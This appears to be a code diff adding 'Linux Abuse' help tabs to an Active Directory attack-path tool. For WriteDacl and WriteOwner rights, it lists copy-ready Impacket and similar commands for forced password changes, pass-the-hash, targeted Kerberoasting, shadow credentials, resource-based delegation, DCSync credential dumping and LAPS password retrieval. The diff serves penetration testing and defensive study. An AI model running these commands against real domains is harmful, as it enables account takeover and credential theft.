+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+                    <p>
+                        Now that you know the target user's plain text password, you can
+                        either start a new agent as that user, or use that user's
+                        credentials in conjunction with PowerView's ACL abuse functions,
+                        or perhaps even RDP to a system the target user has access to.
+                        For more ideas and information, see the references tab.
+                    </p>
+
+                    <h4> Shadow Credentials attack </h4>
+
+                    <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                    <pre>
+                        <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                    </pre>
+
+                    <p>
+                        For other optional parameters, view the pyWhisker documentation.
+                    </p>
+                </>
+            );
+        case 'Computer':
+            if (haslaps) {
+                return (
+                    <>
+                        <p>
+                            To abuse WriteDacl to a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Retrieve LAPS Password </h4>
+
+                        <p>
+                            Full control of a computer object is abusable when
+                            the computer's local admin account credential is
+                            controlled with LAPS. The clear-text password for
+                            the local administrator account is stored in an
+                            extended attribute on the computer object called
+                            ms-Mcs-AdmPwd. With full control of the computer
+                            object, you may have the ability to read this
+                            attribute, or grant yourself the ability to read the
+                            attribute by modifying the computer object's
+                            security descriptor.
+                        </p>
+
+                        <p>
+                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                             to retrieve LAPS passwords:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            </code>
+                        </pre>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            } else {
+                return (
+                    <>
+                        <p>
+                            To abuse WriteDacl to a computer object, you may
+                            grant yourself the GenericAll privilege.
+                        </p>
+
+                        <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            Cleanup of the added ACL can be performed later on with the same tool:
+                        </p>
+
+                        <h4> Resource-Based Constrained Delegation </h4>
+
+                        <p>
+                            First, if an attacker does not control an account with an
+                            SPN set, a new attacker-controlled computer account can be
+                            added with Impacket's addcomputer.py example script:
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            We can then get a service ticket for the service name (sname) we
+                            want to "pretend" to be "admin" for. Impacket's getST.py example script
+                            can be used for that purpose.
+                        </p>
+
+                        <pre>
+                            <code>
+                                {
+                                    "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                                }
+                            </code>
+                        </pre>
+
+                        <p>
+                            This ticket can then be used with Pass-the-Ticket, and could grant access
+                            to the file system of the TARGETCOMPUTER.
+                        </p>
+
+                        <h4> Shadow Credentials attack </h4>
+
+                        <p>To abuse this privilege, use <a href='https://github.com/ShutdownRepo/pywhisker'>pyWhisker</a>.</p>
+
+                        <pre>
+                            <code>{'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}</code>
+                        </pre>
+
+                        <p>
+                            For other optional parameters, view the pyWhisker documentation.
+                        </p>
+                    </>
+                );
+            }
+        case 'Domain':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a domain object, you may grant
+                        yourself the DcSync privileges.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'DCSync' -rights 'FullControl' -principal 'controlledUser' -target-dn 'DomainDisinguishedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> DCSync </h4>
+
+                    <p>
+                        The AllExtendedRights privilege grants {sourceName} both the
+                        DS-Replication-Get-Changes and
+                        DS-Replication-Get-Changes-All privileges, which combined
+                        allow a principal to replicate objects from the domain{' '}
+                        {targetName}.
+                    </p>
+
+                    <p>
+                        This can be abused using Impacket's secretsdump.py example script:
+                    </p>
+
+                    <pre>
+                            <code>
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            </code>
+                    </pre>
+
+                    <h4> Retrieve LAPS Passwords </h4>
+
+                    <p>
+                        If FullControl (GenericAll) is obtained on the domain,
+                        instead of granting DCSync rights, the AllExtendedRights
+                        privilege included grants {sourceName} enough{' '}
+                        privileges to retrieve LAPS passwords domain-wise.
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                         for that purpose:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+        case 'GPO':
+            return (
+                <>
+                    <p>
+                        To abuse WriteDacl to a GPO, you may
+                        grant yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                    Impacket's dacledit can be used for that purpose (cf.
+                    "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <p>
+                        With full control of a GPO, you may make modifications
+                        to that GPO which will then apply to the users and
+                        computers affected by the GPO. Select the target object
+                        you wish to push an evil policy down to, then use the
+                        gpedit GUI to modify the GPO, using an evil policy that
+                        allows item-level targeting, such as a new immediate
+                        scheduled task. Then wait at least 2 hours for the group
+                        policy client to pick up and execute the new evil
+                        policy. See the references tab for a more detailed write
+                        up on this abuse`;
+                    </p>
+
+                    <p>
+                        <a href="https://github.com/Hackndo/pyGPOAbuse">pyGPOAbuse.py</a> can be used for that purpose.
+                    </p>
+                </>
+            );
+        case 'OU':
+            return (
+                <>
+                    <h4>Control of the Organization Unit</h4>
+
+                    <p>
+                        With WriteDacl to an OU object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'OUDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+        case 'Container':
+            return (
+                <>
+                    <h4>Control of the Container</h4>
+
+                    <p>
+                        With WriteDacl to a container object, you may grant yourself
+                        the GenericAll privilege.
+                    </p>
+
+                    <h4>Generic Descendent Object Takeover</h4>
+                    <p>
+                        The simplest and most straight forward way to abuse
+                        control of the OU is to apply a GenericAll ACE on the OU
+                        that will inherit down to all object types. This
+                        can be done using Impacket's dacledit (cf. "grant rights"
+                        reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'JKHOLER' -target-dn 'containerDistinguishedName' 'domain'/'user':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Now, the "JKOHLER" user will have full control of all
+                        descendent objects of each type.
+                    </p>
+
+                    <h4>Targeted Descendent Object Takeoever</h4>
+
+                    <p>
+                        If you want to be more targeted with your approach, it
+                        is possible to specify precisely what right you want to
+                        apply to precisely which kinds of descendent objects.
+                        Refer to the Windows Abuse info for this.
+                    </p>
+                </>
+            );
+    }
+};
+
+LinuxAbuse.propTypes = {
+    sourceName: PropTypes.string,
+    sourceType: PropTypes.string,
+    targetName: PropTypes.string,
+    targetType: PropTypes.string,
+    targetId: PropTypes.string,
+    haslaps: PropTypes.bool,
+};
+
+export default LinuxAbuse;

--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -251,12 +251,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -264,13 +261,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -278,11 +281,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -324,12 +324,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -337,13 +334,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -351,11 +354,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 

--- a/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/LinuxAbuse.jsx
@@ -237,14 +237,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -428,14 +428,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>

--- a/src/components/Modals/HelpTexts/WriteDacl/References.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/References.jsx
@@ -42,6 +42,42 @@ const References = () => {
             <a href='https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8'>
                 https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectorysecurityinheritance?view=netframework-4.8
             </a>
+            <br />
+            <a href='https://github.com/Kevin-Robertson/Powermad#new-machineaccount'>
+                https://github.com/Kevin-Robertson/Powermad#new-machineaccount
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/addmember'>
+                https://www.thehacker.recipes/ad/movement/dacl/addmember
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting'>
+                https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/group-policies'>
+                https://www.thehacker.recipes/ad/movement/group-policies
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword'>
+                https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials'>
+                https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync'>
+                https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'>
+                https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
+            </a>
+            <br />
+            <a href='https://www.thehacker.recipes/ad/movement/dacl/grant-rights'>
+                https://www.thehacker.recipes/ad/movement/dacl/grant-rights
+            </a>
         </>
     );
 };

--- a/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/WindowsAbuse.jsx
@@ -1,7 +1,7 @@
 import React from 'react';
 import PropTypes from 'prop-types';
 
-const Abuse = ({
+const WindowsAbuse = ({
     sourceName,
     sourceType,
     targetName,
@@ -840,7 +840,7 @@ const Abuse = ({
     }
 };
 
-Abuse.propTypes = {
+WindowsAbuse.propTypes = {
     sourceName: PropTypes.string,
     sourceType: PropTypes.string,
     targetName: PropTypes.string,
@@ -849,4 +849,4 @@ Abuse.propTypes = {
     haslaps: PropTypes.bool,
 };
 
-export default Abuse;
+export default WindowsAbuse;

--- a/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx
+++ b/src/components/Modals/HelpTexts/WriteDacl/WriteDacl.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -23,8 +24,8 @@ const WriteDacl = ({
                     targetType={targetType}
                 />
             </Tab>
-            <Tab eventKey={2} title='Abuse Info'>
-                <Abuse
+            <Tab eventKey={2} title='Windows Abuse'>
+                <WindowsAbuse
                     sourceName={sourceName}
                     sourceType={sourceType}
                     targetName={targetName}
@@ -32,10 +33,19 @@ const WriteDacl = ({
                     targetId={targetId}
                 />
             </Tab>
-            <Tab eventKey={3} title='Opsec Considerations'>
+            <Tab eventKey={3} title='Linux Abuse'>
+                <LinuxAbuse
+                    sourceName={sourceName}
+                    sourceType={sourceType}
+                    targetName={targetName}
+                    targetType={targetType}
+                    targetId={targetId}
+                />
+            </Tab>
+            <Tab eventKey={4} title='Opsec'>
                 <Opsec />
             </Tab>
-            <Tab eventKey={4} title='References'>
+            <Tab eventKey={5} title='Refs'>
                 <References />
             </Tab>
         </Tabs>

--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -290,12 +290,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -303,13 +300,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -317,11 +320,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 
@@ -376,12 +376,9 @@ const LinuxAbuse = ({
 
                         <h4> Resource-Based Constrained Delegation </h4>
 
-                        <p>
-                            First, if an attacker does not control an account with an
-                            SPN set, a new attacker-controlled computer account can be
-                            added with Impacket's addcomputer.py example script:
-                        </p>
-
+                        First, if an attacker does not control an account with an
+                        SPN set, a new attacker-controlled computer account can be
+                        added with Impacket's addcomputer.py example script:
                         <pre>
                             <code>
                                 {
@@ -389,13 +386,19 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            We can then get a service ticket for the service name (sname) we
-                            want to "pretend" to be "admin" for. Impacket's getST.py example script
-                            can be used for that purpose.
-                        </p>
-
+                        We now need to configure the target object so that the attacker-controlled
+                        computer can delegate to it. Impacket's rbcd.py script can be used for that
+                        purpose:
+                        <pre>
+                            <code>
+                                {
+                                    "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                                }
+                            </code>
+                        </pre>
+                        And finally we can get a service ticket for the service name (sname) we
+                        want to "pretend" to be "admin" for. Impacket's getST.py example script
+                        can be used for that purpose.
                         <pre>
                             <code>
                                 {
@@ -403,11 +406,8 @@ const LinuxAbuse = ({
                                 }
                             </code>
                         </pre>
-
-                        <p>
-                            This ticket can then be used with Pass-the-Ticket, and could grant access
-                            to the file system of the TARGETCOMPUTER.
-                        </p>
+                        This ticket can then be used with Pass-the-Ticket, and could grant access
+                        to the file system of the TARGETCOMPUTER.
 
                         <h4> Shadow Credentials attack </h4>
 

--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -276,14 +276,14 @@ const LinuxAbuse = ({
                         </p>
 
                         <p>
-                            <a href='https://github.com/n00py/LAPSDumper'>LAPSDumper</a> can be used
+                            <a href='https://github.com/p0dalirius/pyLAPS'>pyLAPS</a> can be used
                              to retrieve LAPS passwords:
                         </p>
 
                         <pre>
                             <code>
                                 {
-                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                    'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                                 }
                             </code>
                         </pre>
@@ -493,14 +493,14 @@ const LinuxAbuse = ({
                     </p>
 
                     <p>
-                        <a href="https://github.com/n00py/LAPSDumper">LAPSDumper</a> can be used
+                        <a href="https://github.com/p0dalirius/pyLAPS">pyLAPS</a> can be used
                          for that purpose:
                     </p>
 
                     <pre>
                         <code>
                             {
-                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                'pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
                             }
                         </code>
                     </pre>

--- a/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/WriteOwner/LinuxAbuse.jsx
@@ -1,0 +1,687 @@
+import React from 'react';
+import PropTypes from 'prop-types';
+
+const LinuxAbuse = ({
+    sourceName,
+    sourceType,
+    targetName,
+    targetType,
+    targetId,
+    haslaps,
+}) => {
+    switch (targetType) {
+        case 'Group':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Modifying the rights </h4>
+
+                    <p>
+                        To abuse ownership of a group object, you may grant
+                        yourself the AddMember privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Adding to the group </h4>
+
+                    <p>
+                        You can now add members to the group.
+                    </p>
+
+                    <p>
+                        Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Pass-the-hash can also be done here with <a href='https://github.com/byt3bl33d3r/pth-toolkit'>pth-toolkit's net tool</a>.
+                        If the LM hash is not known it must be replace with <code>ffffffffffffffffffffffffffffffff</code>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Finally, verify that the user was successfully added to the group:
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        </code>
+                    </pre>
+
+                    <h4> Cleanup </h4>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'remove' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+                </>
+            );
+
+        case 'User':
+            return (
+                <>
+                    <p>
+                        To change the ownership of the object, you may use Impacket's owneredit
+                        example script (cf. "grant ownership" reference for the exact link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "owneredit.py -action write -owner 'attacker' -target 'victim' 'DOMAIN'/'USER':'PASSWORD'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        To abuse ownership of a user object, you may grant
+                        yourself the GenericAll privilege.
+                    </p>
+
+                    <p>
+                        Impacket's dacledit can be used for that purpose (cf.
+                        "grant rights" reference for the link).
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "dacledit.py -action 'write' -rights 'FullControl' -principal 'controlledUser' -target 'targetUser' 'domain'/'controlledUser':'password'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        Cleanup of the added ACL can be performed later on with the same tool:
+                    </p>
+
+                    <h4> Targeted Kerberoast </h4>
+
+                    <p>
+                        A targeted kerberoast attack can be performed using{' '}
+                        <a href='https://github.com/ShutdownRepo/targetedKerberoast'>targetedKerberoast.py</a>.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
+                                "targetedKerberoast.py -v -d 'domain.local' -u 'controlledUser' -p 'ItsPassword'"
+                            }
+                        </code>
+                    </pre>
+
+                    <p>
+                        The tool will automatically attempt a targetedKerberoast
+                        attack, either on all users or against a specific one if
+                        specified in the command line, and then obtain a crackable hash.
+                        The cleanup is done automatically as well.
+                    </p>
+
+                    <p>
+                        The recovered hash can be cracked offline using the tool
+                        of your choice.
+                    </p>
+
+                    <h4> Force Change Password </h4>
+
+                    <p>
+                        Use samba's net tool to change the user's password. The credentials can be supplied in cleartext
+                        or prompted interactively if omitted from the command line. The new password will be prompted
+                        if omitted from the command line.
+                    </p>
+
+                    <pre>
+                        <code>
+                            {
